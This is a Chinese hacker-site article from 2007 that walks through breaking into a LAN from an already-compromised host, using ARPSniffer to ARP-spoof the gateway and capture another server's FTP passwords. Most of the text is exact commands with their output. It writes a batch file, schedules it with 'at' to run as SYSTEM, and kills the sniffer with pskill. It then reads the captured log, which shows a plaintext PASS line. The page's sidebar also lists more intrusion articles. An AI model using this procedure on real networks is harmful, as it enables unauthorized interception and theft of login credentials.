文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 技术文摘 > 入侵攻击 > 文章内容   您对新版的建议

ARP监听渗透内网的方法


www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 

第一步: 
tracert 61.139.1.1 

C:\WIN2000\system32>tracert 61.139.1.1 

Tracing route to HACK-4FJ7EARC [61.139.1.1] 
over a maximum of 30 hops: 

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] 

Trace complete. 

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能 
进行ARPSNIFFER了 

第二步:看本机IP设置和网卡情况 
C:\WIN2000\system32>ipconfig /all 

Windows 2000 IP Configuration 

Host Name . . . . . . . . . . . . : smscomputer 
Primary DNS Suffix . . . . . . . : 
Node Type . . . . . . . . . . . . : Broadcast 
IP Routing Enabled. . . . . . . . : No 
WINS Proxy Enabled. . . . . . . . : No 

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard: 

Connection-specific DNS Suffix . : 
Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection 
Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 
DHCP Enabled. . . . . . . . . . . : No 
IP Address. . . . . . . . . . . . : 61.139.1.2 
Subnet Mask . . . . . . . . . . . : 255.255.255.0 
Default Gateway . . . . . . . . . : 61.139.1.65 
DNS Servers . . . . . . . . . . . : 61.139.1.73 

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地 
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0 
的话也只能嗅探到通过自已的哟. 
从上面我们还可以知道网关是61.139.1.65 

第三步:查看本机时间 
C:\WIN2000\system32>net time \\127.0.0.1 

\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13 

命令完成成功 

要注意的是这儿的时间是12小时式,用at命令应要24小时式 

第四步:编写启动ARPsniffer的bat文件 
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat 

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下: 
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 
www.netXeyes.com 2002, security@vip.sina.com 

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter 
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数) 

Usage: ArpSniffer [/RESET] 

第五步:后台运行开始嗅探咯 
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat 

注意:这儿的时间要用24小时式 
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿 
执行完第四步要先安装WINPCAP 2.1驱动 
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子 

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉 
以SYSTEM权限启动的ARPSniffer程序 
C:\winnt\system32>pulist 
................... 
conime.exe 248 NT AUTHORITY\SYSTEM 
explorer.exe 1864 SMSCOMPUTER\Administrator 
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM 
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了! 
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM 
...................... 

杀了它 
C:\winnt\system32>pskill 2322 
PsKill v1.03 - local and remote process killer 
Copyright (C) 2000 Mark Russinovich 
 

Process 2322 killed. 

C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密码:) 

............... 
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb 
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 
61.188.218.179(1404)->61.139.1.79(21)QUIT 
61.188.218.179(1404)->61.139.1.79(21)QUIT 
61.139.1.79(21)->61.188.218.179(1404)221 
61.139.1.79(21)->61.188.218.179(1404)221 
............ 
............ 

特别要注意的就是PASS哈:) 

---------------------------------------------------- 
付录: 
前台正常执行的显示 

C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset 

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 
www.netXeyes.com 2002, security@vip.sina.com 

Network Adapter 0: Intel(R) 8255x Based Network Connection 

Enable IP Router....OK 

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb 
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6 

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 
有时这儿要先显示can not open driver(0)不管它等一下就可以了 
Begin Sniffer......... 
   ---------------------------------------------------------------------------------------------------
  上一篇:手工注入_拿下一般的php网站
  下一篇:PHP和ASP上传漏洞探究
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
密码失而复得 RAR文件密码
破解WEP无线网络密码详细
一次局域网入侵全过程-完
黑客如何破坏杀毒软件
入侵董燕妮个人网站全过程
破解密码相关心理学知识
经典入侵检测术语全接触
Ms08-067 Exp 详细测试流
Cookies的注入方法和原理
另类破解双系统Vista密码
资深黑客浅谈文件捆绑技术
渗透韩国服务器
免杀技术详解
新的挂马方式ARP欺骗挂马
入侵超变态动网论坛
社会工程学的全方位讲解与
PcShare 免杀 附加数据
SQL注射修改难猜解的MD5
利用WEBSHELL直接进入后台
上网特权我来定
使用CSS进行的攻击
利用MS08-058攻击Google
跨站跨出WEBSHELL
多思路WEB入侵
检测周杰伦官方网站
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号